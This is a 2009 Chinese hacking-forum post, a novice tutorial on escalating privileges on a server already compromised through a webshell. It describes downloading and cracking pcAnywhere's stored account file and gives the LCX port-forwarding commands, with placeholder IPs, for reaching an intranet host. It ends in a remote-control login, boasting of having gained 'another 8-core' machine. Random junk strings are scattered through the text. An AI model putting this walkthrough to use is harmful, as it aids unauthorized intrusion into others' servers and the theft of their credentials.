|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。5 T2 y2 @9 q" J$ O& V
8 h6 ^1 \0 s) E提权方法:pcanywhere+LCX
3 _6 H4 m N: o8 y' m' ]! R( G" E& x4 H' |6 A& }
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。) r0 S. ^) {2 a7 \' d5 ?
) Q4 p6 I* X- X% T在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。7 K+ u. I4 J* T/ n
! T' t8 T2 W ^( O* V
1 u! D: U5 S- [# ~/ f
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。% j- o0 p* P% v$ n% |8 Z* s
( C: s, l9 \4 g# _
& m' C0 s1 L c) I5 W呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。4 Y; \3 g4 {( G- N; y* s/ B% g
0 E" p# T% j* o% X/ x2 {
- h( W5 l, N1 m% k8 e& ]2 h5 `3 c/ ]3 N, I8 z4 X
- \' u* A6 j; o由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
6 p" _' X2 Z% @/ t
' E" K/ Z- N' m/ r9 S: j
& d: b& d/ Y4 u& u. z, [LCX的用法再简单说下:
# J3 U3 p& m @0 E6 i
6 o5 n" K0 a; V% F服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)% s7 ~# x/ W5 j# ~
& f$ {/ X, g6 J |" D本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
7 @2 x3 @0 T( Y3 _ \0 k$ {9 g
/ {, H- q9 z7 p3 E由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。) s+ q. G/ H1 q* Y' M
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
) n$ T7 ?+ w# z8 N$ m' X% C1 w; h# n- ^% |
- d: v# e3 e3 h# y
, k5 ]' Y0 D* t
. b6 o5 o9 \2 W+ o$ [呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
- M* J" L7 R. U( I d' w# z# l4 i. |0 [/ H4 p, v/ A
+ x% D8 u- |0 i5 \5 |" g
, S' q" @) U9 j U& y$ _& F6 A
: t* ~% b6 Q8 U" G/ |我们本地连接试试,输入我们刚破解的账号密码- i$ W' y" z, c+ }/ Q
G. j2 Y* i' \ Q( [+ i! _
( z+ F( J0 D [
呵呵``连接成功,服务器不错,又一个8核^︵^+ o$ l) o. S% J5 `, \/ A/ |
/ r# H1 \6 W4 P7 U8 N+ W
; A4 [" T3 C. [# s# K4 H
/ }' G3 i2 h/ B7 f7 P x6 S
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
